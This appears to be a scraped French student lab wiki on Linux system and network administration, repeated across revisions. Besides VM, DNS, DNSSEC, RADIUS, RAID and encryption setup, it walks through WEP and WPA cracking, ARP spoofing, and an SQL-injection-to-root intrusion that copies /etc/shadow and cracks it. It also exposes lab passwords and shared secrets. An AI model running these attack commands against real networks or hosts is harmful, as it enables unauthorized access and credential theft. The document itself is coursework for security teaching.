2. connexion en tant qu'admin<br />
<br />
3. telechargement du fichier "config-db.php" (On remarque que il existe une BDD phpmyadmin) et "database.php" (ce fichier semble lui ne pas nous apporter d'informations)<br />
<br />
4. honey.plil.info/phpmyadmin -> connexion avec les logins trouvés dans le fichier "config-db.php" (phpmyadmin et gencovid19). On trouve alors une table "pma_users" indiquant le nom de plusieurs utilisateurs (totor62, manuals, phpmyadmin et root).<br />
<br />
5. en essayant le mdp "gencovid19" avec ces identifiants sur phpmyadmin : on peut se connecter en tant que "root" sur la BDD et on trouve le mdp de rex dans la bdd "test" et table "users".<br />
<br />
6. connexion en ssh sur rex@honey.plil.info.<br />
<br />
7. comme indication : "le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets". Alors on va créer un fichier de mots de 4 lettre pour ensuite doubler ces mots (exemple : bobo => bobobobo) pour essayer de cracker le mot de passe par la force brute. On créée alors le dictionnaire avec l'utilitaire crunch comme pour obtenir les clefs WEP :<br />
<br />
$ crunch 4 4 abcdefghijklmnopqrstuvwxyz > dico.txt<br />
<br />
Et on double la taille des mots :<br />
<br />
$ sed -i 's/\(.*\)/\1\1/' dico.txt<br />
<br />
On copie ensuite les fichiers "/etc/passwd" et "/etc/shadow" de rex@honey.plil.info sur notre zabeth. <br />
<br />
$ scp rex@honey.plil.info:/etc/passwd .<br />
$ scp rex@honey.plil.info:/etc/shadow .<br />
<br />
On utilise alors l'utilitaire "shadow" pour obtenir un fichier contenant le mot de passe haché de root :<br />
<br />
$ unshadow passwd shadow | head -1 > honey<br />
<br />
Puis on utilise "John the Ripper" pour cracker le mot de passe :<br />
<br />
$ john -w:dico.txt honey<br />
<br />
Après quelques minutes, on peut afficher le mot de passe trouvé :<br />
<br />
$ john --show honey<br />
root:fortfort:0:0:root:/root:/bin/bash<br />
1 password hash cracked, 0 left<br />
<br />
On trouve le mot de passe de root@honey.plil.info qui est "fortfort".<br />
<br />
= Point d'accès Wi-Fi authentifié via FreeRADIUS =<br />
<br />
== Configuration du point d'accès ==<br />
<br />
=== Point d'accès ===<br />
<br />
Tout d'abord il faut configurer l'authentification EAP dans la configuration :<br />
<br />
conf t<br />
<br />
aaa new-model<br />
aaa authentication login eap_rose group radius_rose<br />
radius-server host 193.48.57.181 auth-port 1812 acct-port 1813 key zinzin<br />
aaa group server radius radius_rose<br />
server 193.48.57.181 auth-port 1812 acct-port 1813<br />
exit<br />
<br />
Configurons le SSID :<br />
<br />
conf t<br />
<br />
dot11 ssid SSID_ROSE<br />
vlan 5<br />
authentication open eap eap_rose<br />
authentication network-eap eap_rose<br />
authentication key-management wpa<br />
mbssid guest-mode<br />
exit<br />
exit<br />
<br />
On associe notre SSID à l'interface WIFI :<br />
<br />
conf t<br />
<br />
interface Dot11Radio0<br />
encryption vlan 5 mode ciphers aes-ccm tkip<br />
ssid SSID_ROSE<br />
mbssid<br />
exit<br />
exit<br />
<br />
On paramètre notre VLAN (5)<br />
<br />
conf t<br />
<br />
interface Dot11Radio0.5<br />
encapsulation dot1Q 5<br />
no ip route-cache<br />
bridge-group 5<br />
bridge-group 5 subscriber-loop-control<br />
bridge-group 5 spanning-disabled<br />
bridge-group 5 block-unknown-source<br />
exit<br />
exit<br />
<br />
On configure l'interface filaire<br />
<br />
conf t<br />
<br />
interface GigabitEthernet0.5<br />
encapsulation dot1Q 5<br />
bridge-group 5<br />
exit<br />
exit<br />
<br />
Enfin, on configure l'IP de l'AP et sa gateway<br />
<br />
conf t<br />
<br />
ip default-gateway 10.1.0.1<br />
interface BVI 1<br />
ip address 10.1.0.3 255.255.255.0<br />
exit<br />
exit<br />
<br />
=== Routeur ===<br />
<br />
Commençons par configurer le VLAN 1 <br />
<br />
conf t<br />
<br />
interface vlan 1<br />
ip address 10.1.0.1 255.255.255.0<br />
exit<br />
exit<br />
<br />
Puis on configure le port (ici Gi1/0/3<br />
<br />
conf t<br />
<br />
interface Gi1/0/3<br />
switchport<br />
switchport mode trunk<br />
switchport trunk allowed vlan add 1<br />
exit<br />
exit<br />
<br />
Et voilà mon grand<br />
<br />
== Serveur FreeRADIUS ==<br />
<br />
Installation de freeRADIUS<br />
<br />
apt install freeradius<br />
<br />
On commence par configurer <code>/etc/freeradius/3.0/clients.conf</code> à détailler<br />
<br />
client zozo {<br />
ipaddr = 10.1.0.3/24<br />
secret = zinzin<br />
}<br />
<br />
ensuite <code>/etc/freeradius/3.0/eap.conf</code><br />
<br />
eap {<br />
[...]<br />
default_eap_type = peap<br />
}<br />
<br />
puis <code>/etc/freeradius/3.0/users</code><br />
<br />
[...]<br />
root Cleartext-Password := "glopglop"<br />
<br />
Pour vérifier que tout fonctionne bien, on peut lancer freeradius en mode debug <code>freeradius -X</code> (après avoir au préalable stoppé le processus)<br />
<br />
= Réalisations =<br />
<br />
== Sécurisation des données (RAID 5) ==<br />
<br />
Nous avons besoin de 3 LV à rajouter à notre VM :<br />
<br />
$ lvcreate -L1G -n Bellerose-raid1 storage<br />
$ lvcreate -L1G -n Bellerose-raid2 storage<br />
$ lvcreate -L1G -n Bellerose-raid3 storage<br />
<br />
Nous pouvons ainsi les rajouter à la configuration de notre VM (<code>/etc/xen/Bellerose.cfg</code>):<br />
<br />
'phy:/dev/storage/Bellerose-raid1,xvda5,w'<br />
'phy:/dev/storage/Bellerose-raid2,xvda6,w'<br />
'phy:/dev/storage/Bellerose-raid3,xvda7,w'<br />
<br />
Nous pouvons ensuite créer le RAID en relançant la VM et en se connectant dessus.<br />
<br />
$ apt install mdadm<br />
<br />
On va ensuite créer un disque nommé <code>/dev/md0</code> grâce à <code>mdadm</code> :<br />
<br />
$ mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7<br />
<br />
On peut ainsi vérifier que notre RAID 5 est effectif :<br />
<br />
$ lsblk<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
xvda5 202:5 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
xvda6 202:6 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
xvda7 202:7 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
<br />
Enfin il faut monter ce disque fraîchement créé :<br />
<br />
$ mkfs.ext4 /dev/md0<br />
$ mkdir /media/raid<br />
<br />
on ajoute cette ligne dans <code>/etc/fstab</code> :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
puis<br />
<br />
$ mount -a<br />
<br />
et toc<br />
<br />
== Chiffrement des données ==<br />
<br />
On branche la clé USB sur le petit PC bleu, et on lance <code>lsblk</code> et on trouve :<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
sda 8:0 1 7,2G 0 disk <br />
<br />
Donc on peut formater la clef qui contient déjà quelque chose dessus :<br />
<br />
$ mkfs.ext4 /dev/sda<br />
<br />
Avec <code>cryptsetup</code> on peut initialiser la clef et lui donner un mdp :<br />
<br />
$ cryptsetup luksFormat /dev/sda<br />
<br />
On crée une partition chiffrée sur la clé :<br />
<br />
$ cryptsetup luksOpen /dev/sda data<br />
<br />
Et on formate :<br />
<br />
$ mkfs.ext4 /dev/mapper/data<br />
<br />
On monte cette partition pour lui permettre de contenir des fichiers :<br />
<br />
$ mkdir /mnt/data-usb<br />
$ mount -t ext4 /dev/mapper/data /mnt/data-usb<br />
<br />
On y ajoute donc un fichier de test :<br />
<br />
$ touch /mnt/data-usb/boujour.txt<br />
<br />
Puis on démonte et on ferme le volume chiffré<br />
<br />
$ umont /mnt/data-usb<br />
$ cryptsetup luksClose data<br />
<br />
Ensuite en branchant la clé USB sur un autre PC pour voir le fonctionnement de notre chiffrement, et lorsqu'on essaie d'accèder à la clef, celle ci nous demande un mot de passe pour accèder aux fichiers, donc le chiffrement fonctionne correctement.</div>Bjacquothttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G6&diff=57831TP sysres IMA5 2021/2022 G62022-01-11T11:17:20Z<p>Bjacquot : /* DNSSEC */</p>
<hr />
<div>__TOC__<br />
<br style="clear: both;"/><br />
<br />
=Création de la machine virtuelle=<br />
<br />
On veut créer notre machine virtuelle sur l'hyperviseur (HV) capbreton. Afin de pouvoir télécharger l'image Debian, on utilise tout d'abord la commande suivante :<br />
<br />
$ export http_proxy=http://proxy.plil.fr:3128<br />
<br />
Pour lancer la création de la machine virtuelle, on doit donner le nom de la machine qui sera Bellerose (d'après le thème des noms de bière). Ensuite nous avons l'adresse IP qui nous a été attribuée lors de la répartition des groupes (donc pour nous ce sera 193.48.57.181). On donne aussi l'adresse IP du routeur flottant (193.48.57.190) et le masque du réseau (255.255.255.240 car c'est un /28). On indique également l'emplacement des disques virtuels : /usr/local/xen, le mot de passe pour se connecter à la machine virtuelle : pasglop, et la distribution que nous allons utiliser qui est Debian bullseye.<br />
<br />
$ xen-create-image --hostname=Bellerose --ip=193.48.57.181 --gateway=193.48.57.190 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
On crée ensuite 2 LV de 10 Go (nommés Bellerose1 et Bellerose2) sur le groupe de volume storage.<br />
<br />
$ lvcreate -L10G -n Bellerose1 storage<br />
$ lvcreate -L10G -n Bellerose2 storage<br />
<br />
Puis il faut les formater au format ext4, alors on utilise les commandes suivantes :<br />
<br />
$ mkfs.ext4 /dev/storage/Bellerose1<br />
$ mkfs.ext4 /dev/storage/Bellerose2<br />
<br />
On modifie notre fichier /etc/xen/Bellerose.cfg pour indiquer à la machine virtuelle qu'elle possède les volumes logiques Bellerose1 et Bellerose2 (on ajoute alors 2 lignes dans la fonction disk) et on ajoute le bridge IMA5sc dans la fonction vif.<br />
<br />
$ vim /etc/xen/Bellerose.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Bellerose1,xvda3,w',<br />
'phy:/dev/storage/Bellerose2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.181 ,mac=00:16:3E:FA:D0:95 ,bridge=IMA5sc' ]<br />
<br />
On peut maintenant lancer notre machine virtuelle :<br />
<br />
$ xl create -c /etc/xen/Bellerose.cfg<br />
<br />
Avec la commande :<br />
<br />
$ cat /etc/fstab<br />
<br />
On voit xvda1 et xvda2. On va créer xvda3 et xvda4 pour pouvoir y mettre les répertoires var et home de notre machine virtuelle :<br />
<br />
$ mkdir /mnt/xvda3<br />
$ mkdir /mnt/xvda4<br />
$ mount /dev/xvda3 /mnt/xvda3<br />
$ mount /dev/xvda4 /mnt/xvda4<br />
<br />
Puis on déplace le répertoire var dans le disque xvda4 :<br />
<br />
$ mv /var/* /mnt/xvda4<br />
<br />
Pour monter les disques, on ajoute ces lignes dans le fichier /etc/fstab :<br />
<br />
# /home vers xvda3<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
# /var vers xvda4<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On monte le tout à l'aide de la commande :<br />
<br />
mount -a<br />
<br />
Enfin avec lsblk, on peut voir les deux partitions de notre VM :<br />
<br />
$ lsblk<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
Enfin, nous activons l'IPv6 sur l'interface en modifiant <code>/etc/network/interfaces</code><br />
<br />
iface eth0 inet6 auto<br />
<br />
Pour quitter la VM : CTRL+]<br />
<br />
= Services Internet =<br />
<br />
== Serveur SSh ==<br />
<br />
$ apt install openssh-server<br />
<br />
on édite le fichierde conf <code>/etc/ssh/sshd_config</code> (via ssh key) :<br />
<br />
PermitRootLogin without-password<br />
PubkeyAuthentication yes<br />
<br />
après on reload la conf<br />
<br />
$ systemctl reload ssh<br />
<br />
On génère une clé ssh avec <code>ssh-keygen -t ed25519</code> et on l'ajoute dans <code>/.ssh/authorized_keys</code> et c'est gooooood<br />
<br />
== Serveur DNS ==<br />
<br />
on achète le ndd<br />
<br />
on crée un "Glue Record" pour notre nameserver <code>ns1.belle-rose.site</code><br />
<br />
on install bind<br />
<br />
$ apt install bind9<br />
<br />
on configure <code>/etc/resolv.conf</code><br />
<br />
nameserver 127.0.0.1<br />
<br />
on configure bind <code>/etc/bind/named.conf.local</code><br />
<br />
zone "belle-rose.site" IN {<br />
type master;<br />
file "/etc/bind/db.belle-rose.site";<br />
allow-transfer { 217.70.177.40; };<br />
};<br />
<br />
On ajoute nos ns <code>/etc/bind/db.belle-rose.site</code><br />
<br />
;<br />
; BIND dans ta face<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.belle-rose.site. postmaster.belle-rose.site. (<br />
2 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.belle-rose.site.<br />
@ IN NS ns6.gandi.net.<br />
ns1 IN A 193.48.57.181<br />
<br />
Ensuite on peut tester notre conf avec<br />
<br />
$ host -t any ns1.belle-rose.site localhost<br />
Using domain server:<br />
Name: localhost<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
ns1.belle-rose.site has address 193.48.57.181<br />
<br />
Et on incrémente aussi le Serial dans <code>/etc/bind/db.belle-rose.site</code> à 3.<br />
<br />
== Certificat ==<br />
<br />
Notre certificat Gandi nous a été retiré de force par quelqu'un de mal intentionné. De ce fait, nous avons utilisé un certificat <code>Let's Encrypt</code>. Après avoir installé <code>certbot</code>, on utilise simplement la commande :<br />
<br />
certbot --apache<br />
<br />
https://www.belle-rose.site/ IZOK<br />
<br />
== DNSSEC ==<br />
<br />
On suit les étapes suivantes :<br />
<br />
1. On ajoute l’option <code>dnssec-enable yes;</code> dans le fichier <code>named.conf.options</code><br />
<br />
2. On crée un répertoire <code>belle-rose.site.dnssec</code> pour y générer les clefs<br />
<br />
3. On crée la clef asymétrique de signature de clefs de zone :<br />
<br />
$ dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE belle-rose.site<br />
<br />
4. On crée la clef asymétrique de la zone pour signer les enregistrements<br />
<br />
$ dnssec-keygen -a RSASHA1 -b 1024 -n ZONE belle-rose.site <br />
<br />
5. On renomme les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);<br />
<br />
$ mv Kbelle-rose.site.+005+37138.key belle-rose.site-ksk.key<br />
$ mv Kbelle-rose.site.+005+35638.key belle-rose.site-zsk.key<br />
$ mv Kbelle-rose.site.+005+37138.private belle-rose.site-ksk.private<br />
$ mv Kbelle-rose.site.+005+35638.private belle-rose.site-zsk.private<br />
<br />
6. On inclue les clefs publiques dans votre fichier de zone <code>/etc/bind/db.belle-rose.site</code>, et on incrémente le numéro de version de la zone ;<br />
<br />
$include /etc/bind/belle-rose.site.dnssec/belle-rose.site-ksk.key<br />
$include /etc/bind/belle-rose.site.dnssec/belle-rose.site-zsk.key<br />
<br />
7. On signe les enregistrements de la zone ;<br />
<br />
$ dnssec-signzone -o belle-rose.site -k belle-rose.site-ksk ../db.belle-rose.site belle-rose.site-zsk<br />
<br />
8. On modifie le fichier <code>named.conf.local</code> pour utiliser la zone signée de suffixe .signed :<br />
<br />
$ vim ../named.conf.local<br />
zone "belle-rose.site" IN {<br />
type master;<br />
file "/etc/bind/db.belle-rose.site.signed";<br />
allow-transfer { 217.70.177.40; };<br />
};<br />
<br />
9. il ne reste plus qu’à communiquer la partie publique de la KSK (présente dans le fichier www.belle-rose.site-ksk.key) à notre registrar (sur gandi.net, dans la section "Manage DNSSEC" puis "DNS servers")<br />
<br />
$ cat www.belle-rose.site-ksk.key <br />
; This is a key-signing key, keyid 37138, for www.belle-rose.site.<br />
; Created: 20220110141246 (Mon Jan 10 14:12:46 2022)<br />
; Publish: 20220110141246 (Mon Jan 10 14:12:46 2022)<br />
; Activate: 20220110141246 (Mon Jan 10 14:12:46 2022)<br />
www.belle-rose.site. IN DNSKEY 257 3 5 AwEAAdj7i1QbWFS5EPthytgpKDLbqx8PWbtArgcXL4zZFFPeWBfD1yVa IP0XjVfzi+4/MaPU778QUy1g7edNar8355/YCWMRQrzIJZN9adpBHBMj XWT2tR9ilLSoB1TmIy6ZC/DZmlR8XShUixG0YDkXFJ7eVyZNpKVAnKKx /jp5foFzs1yCiIBRmE00dQvikn81aGdLOSXOY2UdbxC2rE6VXrs1jYeL 29hD+R/HDJEXf7m+qPSlYVyayKXu3WW8RRMPYp7IqcYCUuM78OKC2qkv //82v8yLyB3ppixJpI7U7OR0K89f4sPASER8CW6bwOE5eee+YWw0BLS5 cu8JukZXbNs=<br />
<br />
(on copie que la partie chiffrée, pas le record DNSKEY)<br />
<br />
= Tests d'intrusion =<br />
<br />
== Exploitation de failles du système ==<br />
<br />
Après plusieurs recherches, nous avons trouvé un petit soft permettant d'audit notre système et y afficher les possibles failles. > https://github.com/mzet-/linux-exploit-suggester<br />
<br />
En suivant la documentation :<br />
<br />
$ wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh<br />
$ chmod +x les.sh && ./les.sh<br />
<br />
On obtient les failles suivantes (audit réalisé sur notre VM) :<br />
<br />
[+] [CVE-2021-27365] linux-iscsi<br />
...<br />
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write<br />
...<br />
[+] [CVE-2019-13272] PTRACE_TRACEME<br />
...<br />
<br />
== Cassage de clef WEP d’un point d’accès WiFi ==<br />
<br />
On commence par rechercher le nom de notre interface. On utilise alors la commande (en root) :<br />
<br />
$ airmon-ng<br />
<br />
On trouve l'interface suivante :<br />
<br />
wlx40a5ef0127d0<br />
<br />
On essaie de démarrer l'interface sur le channel 3 :<br />
<br />
$ airmon-ng start wlx40a5ef0127d0 3<br />
<br />
Or on remarque que la réponse de la commande nous indique que l'interface a été renommé automatiquement "wlan0mon". On ré-utilise la commande précédente avec le nouveau nom d'interface :<br />
<br />
$ airmon-ng start wlan0mon 3<br />
<br />
On écoute ensuite tous les paquets dans l'air :<br />
<br />
$ airodump-ng wlan0mon<br />
<br />
A partir de là, on peut choisir un point d'accès à cracker en utilisant son BSSID (obtenu par la commande précédente). On choisit cracotte06.<br />
<br />
$ aireplay-ng -9 -e cracotte06 -a 04:DA:D2:9C:50:55 wlan0mon<br />
<br />
On peut récupérer les VI générés par le point d'accès en les stockant dans les fichiers output. On donne le channel 4 puisque le point d'accès est sur ce channel :<br />
<br />
$ airodump-ng -c 4 --bssid 04:DA:d2:9C:50:55 -w output wlan0mon<br />
<br />
On effectue de fausses authentifications avec la commande aireplay-ng dans un nouveau terminal :<br />
<br />
$ aireplay-ng -1 0 -e cracotte06 -a 04:DA:D2:9C:50:55 -h 40:A5:EF:01:0E:5F wlan0mon<br />
<br />
L'adresse MAC source donnée après le -h est obtenue lorsque l'on récupère les VI.<br />
<br />
Il faut maintenant laisser tourner la commande de récupération des VI assez longtemps pour obtenir assez de données (pour nous içi il a fallu attendre 40000 datas). On peut ensuite décrypter la clef WEP :<br />
<br />
$ aircrack-ng -b 04:DA:D2:9C:50:55 output*.cap<br />
<br />
On obtient alors :<br />
<br />
KEY FOUND ! [ 55:55:55:55:5A:BC:07:CB:A4:44:44:44:44 ]<br />
Decrypted correctly: 100%<br />
<br />
== Cassage de mot de passe WPA-PSK par force brute ==<br />
<br />
$ airmon-ng<br />
$ airmon-ng start wlan0mon 9<br />
$ airodump-ng wlan0mon<br />
<br />
On choisit le point d'accès kracotte06 à cracker. On récupère son BSSID avec la commande précédente et on utilise :<br />
<br />
$ airodump-ng -c 4 --bssid 44:AD:D9:5F:87:05 -w psk wlan0mon<br />
<br />
On crée le dictionnaire contenant toutes les clefs à tester avec la commande <code>crunch</code><br />
<br />
$ crunch 8 8 0123456789 -o dictionnaire.lst<br />
<br />
Pour savoir si un Handshake a été trouvé, on utilise la commande :<br />
<br />
$ aircrack-ng psk*.cap<br />
<br />
On trouve : <br />
<br />
# BSSID ESSID Encryption<br />
1 44:AD:D9:5F:87:05 kracotte06 WPA (1 handshake)<br />
<br />
On peut alors lancer la commande de test des clefs :<br />
<br />
$ aircrack-ng -w dictionnaire.lst -b 44:AD:D9:5F:87:05 psk*.cap<br />
<br />
Après un peu d'attente, on obtient la clef suivante :<br />
<br />
KEY FOUND! [ 59906999 ]<br />
<br />
== Attaque de type "homme au milieu" par usurpation ARP ==<br />
<br />
On branche un PC bleu sur une zabeth en ethernet et on lui configure une IP. Ensuite on peut installer dsniff et wireshark.<br />
<br />
On fait :<br />
<br />
$ echo 1 > /proc/sys/net/ipv4/ip_forward<br />
<br />
Puis on se fait passer pour le routeur (172.26.145.254) auprès de la zabeth (172.26.145.61):<br />
<br />
$ arpspoof -t 172.26.145.61 172.26.145.254<br />
<br />
En lançant wireshark, on peut voir les informations envoyées par la zabeth passer en clair.<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
Sur honey.plil.info : <br />
<br />
1. injection SQL<br />
<br />
2. connexion en tant qu'admin<br />
<br />
3. telechargement du fichier "config-db.php" (On remarque que il existe une BDD phpmyadmin) et "database.php" (ce fichier semble lui ne pas nous apporter d'informations)<br />
<br />
4. honey.plil.info/phpmyadmin -> connexion avec les logins trouvés dans le fichier "config-db.php" (phpmyadmin et gencovid19). On trouve alors une table "pma_users" indiquant le nom de plusieurs utilisateurs (totor62, manuals, phpmyadmin et root).<br />
<br />
5. en essayant le mdp "gencovid19" avec ces identifiants sur phpmyadmin : on peut se connecter en tant que "root" sur la BDD et on trouve le mdp de rex dans la bdd "test" et table "users".<br />
<br />
6. connexion en ssh sur rex@honey.plil.info.<br />
<br />
7. comme indication : "le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets". Alors on va créer un fichier de mots de 4 lettre pour ensuite doubler ces mots (exemple : bobo => bobobobo) pour essayer de cracker le mot de passe par la force brute. On créée alors le dictionnaire avec l'utilitaire crunch comme pour obtenir les clefs WEP :<br />
<br />
$ crunch 4 4 abcdefghijklmnopqrstuvwxyz > dico.txt<br />
<br />
Et on double la taille des mots :<br />
<br />
$ sed -i 's/\(.*\)/\1\1/' dico.txt<br />
<br />
On copie ensuite les fichiers "/etc/passwd" et "/etc/shadow" de rex@honey.plil.info sur notre zabeth. <br />
<br />
$ scp rex@honey.plil.info:/etc/passwd .<br />
$ scp rex@honey.plil.info:/etc/shadow .<br />
<br />
On utilise alors l'utilitaire "shadow" pour obtenir un fichier contenant le mot de passe haché de root :<br />
<br />
$ unshadow passwd shadow | head -1 > honey<br />
<br />
Puis on utilise "John the Ripper" pour cracker le mot de passe :<br />
<br />
$ john -w:dico.txt honey<br />
<br />
Après quelques minutes, on peut afficher le mot de passe trouvé :<br />
<br />
$ john --show honey<br />
root:fortfort:0:0:root:/root:/bin/bash<br />
1 password hash cracked, 0 left<br />
<br />
On trouve le mot de passe de root@honey.plil.info qui est "fortfort".<br />
<br />
= Point d'accès Wi-Fi authentifié via FreeRADIUS =<br />
<br />
== Configuration du point d'accès ==<br />
<br />
=== Point d'accès ===<br />
<br />
Tout d'abord il faut configurer l'authentification EAP dans la configuration :<br />
<br />
conf t<br />
<br />
aaa new-model<br />
aaa authentication login eap_rose group radius_rose<br />
radius-server host 193.48.57.181 auth-port 1812 acct-port 1813 key zinzin<br />
aaa group server radius radius_rose<br />
server 193.48.57.181 auth-port 1812 acct-port 1813<br />
exit<br />
<br />
Configurons le SSID :<br />
<br />
conf t<br />
<br />
dot11 ssid SSID_ROSE<br />
vlan 5<br />
authentication open eap eap_rose<br />
authentication network-eap eap_rose<br />
authentication key-management wpa<br />
mbssid guest-mode<br />
exit<br />
exit<br />
<br />
On associe notre SSID à l'interface WIFI :<br />
<br />
conf t<br />
<br />
interface Dot11Radio0<br />
encryption vlan 5 mode ciphers aes-ccm tkip<br />
ssid SSID_ROSE<br />
mbssid<br />
exit<br />
exit<br />
<br />
On paramètre notre VLAN (5)<br />
<br />
conf t<br />
<br />
interface Dot11Radio0.5<br />
encapsulation dot1Q 5<br />
no ip route-cache<br />
bridge-group 5<br />
bridge-group 5 subscriber-loop-control<br />
bridge-group 5 spanning-disabled<br />
bridge-group 5 block-unknown-source<br />
exit<br />
exit<br />
<br />
On configure l'interface filaire<br />
<br />
conf t<br />
<br />
interface GigabitEthernet0.5<br />
encapsulation dot1Q 5<br />
bridge-group 5<br />
exit<br />
exit<br />
<br />
Enfin, on configure l'IP de l'AP et sa gateway<br />
<br />
conf t<br />
<br />
ip default-gateway 10.1.0.1<br />
interface BVI 1<br />
ip address 10.1.0.3 255.255.255.0<br />
exit<br />
exit<br />
<br />
=== Routeur ===<br />
<br />
Commençons par configurer le VLAN 1 <br />
<br />
conf t<br />
<br />
interface vlan 1<br />
ip address 10.1.0.1 255.255.255.0<br />
exit<br />
exit<br />
<br />
Puis on configure le port (ici Gi1/0/3<br />
<br />
conf t<br />
<br />
interface Gi1/0/3<br />
switchport<br />
switchport mode trunk<br />
switchport trunk allowed vlan add 1<br />
exit<br />
exit<br />
<br />
Et voilà mon grand<br />
<br />
== Serveur FreeRADIUS ==<br />
<br />
Installation de freeRADIUS<br />
<br />
apt install freeradius<br />
<br />
On commence par configurer <code>/etc/freeradius/3.0/clients.conf</code> à détailler<br />
<br />
client zozo {<br />
ipaddr = 10.1.0.3/24<br />
secret = zinzin<br />
}<br />
<br />
ensuite <code>/etc/freeradius/3.0/eap.conf</code><br />
<br />
eap {<br />
[...]<br />
default_eap_type = peap<br />
}<br />
<br />
puis <code>/etc/freeradius/3.0/users</code><br />
<br />
[...]<br />
root Cleartext-Password := "glopglop"<br />
<br />
Pour vérifier que tout fonctionne bien, on peut lancer freeradius en mode debug <code>freeradius -X</code> (après avoir au préalable stoppé le processus)<br />
<br />
= Réalisations =<br />
<br />
== Sécurisation des données (RAID 5) ==<br />
<br />
Nous avons besoin de 3 LV à rajouter à notre VM :<br />
<br />
$ lvcreate -L1G -n Bellerose-raid1 storage<br />
$ lvcreate -L1G -n Bellerose-raid2 storage<br />
$ lvcreate -L1G -n Bellerose-raid3 storage<br />
<br />
Nous pouvons ainsi les rajouter à la configuration de notre VM (<code>/etc/xen/Bellerose.cfg</code>):<br />
<br />
'phy:/dev/storage/Bellerose-raid1,xvda5,w'<br />
'phy:/dev/storage/Bellerose-raid2,xvda6,w'<br />
'phy:/dev/storage/Bellerose-raid3,xvda7,w'<br />
<br />
Nous pouvons ensuite créer le RAID en relançant la VM et en se connectant dessus.<br />
<br />
$ apt install mdadm<br />
<br />
On va ensuite créer un disque nommé <code>/dev/md0</code> grâce à <code>mdadm</code> :<br />
<br />
$ mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7<br />
<br />
On peut ainsi vérifier que notre RAID 5 est effectif :<br />
<br />
$ lsblk<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
xvda5 202:5 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
xvda6 202:6 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
xvda7 202:7 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
<br />
Enfin il faut monter ce disque fraîchement créé :<br />
<br />
$ mkfs.ext4 /dev/md0<br />
$ mkdir /media/raid<br />
<br />
on ajoute cette ligne dans <code>/etc/fstab</code> :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
puis<br />
<br />
$ mount -a<br />
<br />
et toc<br />
<br />
== Chiffrement des données ==<br />
<br />
On branche la clé USB sur le petit PC bleu, et on lance <code>lsblk</code> et on trouve :<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
sda 8:0 1 7,2G 0 disk <br />
<br />
Donc on peut formater la clef qui contient déjà quelque chose dessus :<br />
<br />
$ mkfs.ext4 /dev/sda<br />
<br />
Avec <code>cryptsetup</code> on peut initialiser la clef et lui donner un mdp :<br />
<br />
$ cryptsetup luksFormat /dev/sda<br />
<br />
On crée une partition chiffrée sur la clé :<br />
<br />
$ cryptsetup luksOpen /dev/sda data<br />
<br />
Et on formate :<br />
<br />
$ mkfs.ext4 /dev/mapper/data<br />
<br />
On monte cette partition pour lui permettre de contenir des fichiers :<br />
<br />
$ mkdir /mnt/data-usb<br />
$ mount -t ext4 /dev/mapper/data /mnt/data-usb<br />
<br />
On y ajoute donc un fichier de test :<br />
<br />
$ touch /mnt/data-usb/boujour.txt<br />
<br />
Puis on démonte et on ferme le volume chiffré<br />
<br />
$ umont /mnt/data-usb<br />
$ cryptsetup luksClose data<br />
<br />
Ensuite en branchant la clé USB sur un autre PC pour voir le fonctionnement de notre chiffrement, et lorsqu'on essaie d'accèder à la clef, celle ci nous demande un mot de passe pour accèder aux fichiers, donc le chiffrement fonctionne correctement.</div>Bjacquothttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G6&diff=57748TP sysres IMA5 2021/2022 G62022-01-10T16:45:59Z<p>Bjacquot : /* DNSSEC */</p>
<hr />
<div>__TOC__<br />
<br style="clear: both;"/><br />
<br />
=Création de la machine virtuelle=<br />
<br />
